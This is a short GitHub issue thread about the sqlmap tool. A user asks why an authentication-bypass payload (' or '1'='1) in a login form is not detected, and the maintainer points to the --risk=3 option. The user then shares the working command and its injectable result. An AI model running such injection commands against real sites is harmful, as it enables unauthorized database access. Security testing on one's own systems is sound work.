### ISSUE TITLE
simple password attack not working in terminal

### ISSUE THREAD

**Issue by jitchavan** [sqlmapproject/sqlmap#3235]
Below is the command i run into terminal.
```
python sqlmap.py -u "http://local/project1/page.php" --data="username=a&password=' or '1'='1"
```
This does not return parameters as injectable. But when i try above password hack directly into browser form it logged in as a user.
I have downloaded latest sqlmap dev environment today.

**Comment by stamparm** [comment]
1) I won't support this kind of Issues where you are being warned in plain-speak to not use this kind of data:

![1](https://user-images.githubusercontent.com/921555/45425030-86f09c80-b698-11e8-823a-bbc3ec7c1697.png)

2) You should use at least `--risk=3` to include `OR boolean-based blind` payloads which you require. Those payloads are turned off by default because of a risk of breaking something at the other end (e.g. inside the `DELETE` or `UPDATE` statement)

**Comment by jitchavan** [comment]
i got the solution for above issue. Adding comment so that someone will get info from this thread. 
I missed one more parameter which is posted back with the form. when added that with the url above it  started to work.

`python sqlmap.py -u "http://local/project1/page.php" --data="username=a&password=' or '1'='1&action=login"
`
below is terminal result.
`[18:09:34] [INFO] POST parameter 'password' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable`
